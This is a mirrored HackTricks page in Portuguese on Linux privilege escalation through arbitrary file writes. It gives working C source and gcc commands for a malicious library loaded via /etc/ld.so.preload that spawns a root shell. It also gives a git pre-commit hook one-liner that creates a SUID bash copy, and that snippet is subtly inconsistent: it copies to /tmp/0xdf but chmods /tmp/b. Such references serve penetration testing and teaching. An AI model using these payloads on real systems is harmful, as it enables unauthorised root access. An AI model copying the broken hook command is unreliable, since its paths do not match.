Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-22 02:53:28 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/linux-hardening/privilege-escalation/write-to-root.md
Translator workflow c928d8e52e Translated to Portuguese
2023-06-06 18:56:34 +00:00

4.6 KiB
Raw Blame History

Escrita arbitrária de arquivos para root

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

/etc/ld.so.preload

Este arquivo se comporta como a variável de ambiente LD_PRELOAD, mas também funciona em binários SUID.
Se você pode criá-lo ou modificá-lo, pode simplesmente adicionar um caminho para uma biblioteca que será carregada com cada binário executado.

Por exemplo: echo "/tmp/pe.so" > /etc/ld.so.preload

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unlink("/etc/ld.so.preload");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Hooks do Git

Hooks do Git são scripts que são executados em vários eventos em um repositório git, como quando um commit é criado, um merge... Então, se um script ou usuário privilegiado estiver executando essas ações com frequência e for possível escrever na pasta .git, isso pode ser usado para escalada de privilégios.

Por exemplo, é possível gerar um script em um repositório git em .git/hooks para que ele seja sempre executado quando um novo commit é criado:

{% code overflow="wrap" %}

echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
chmod +x pre-commit

{% endcode %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥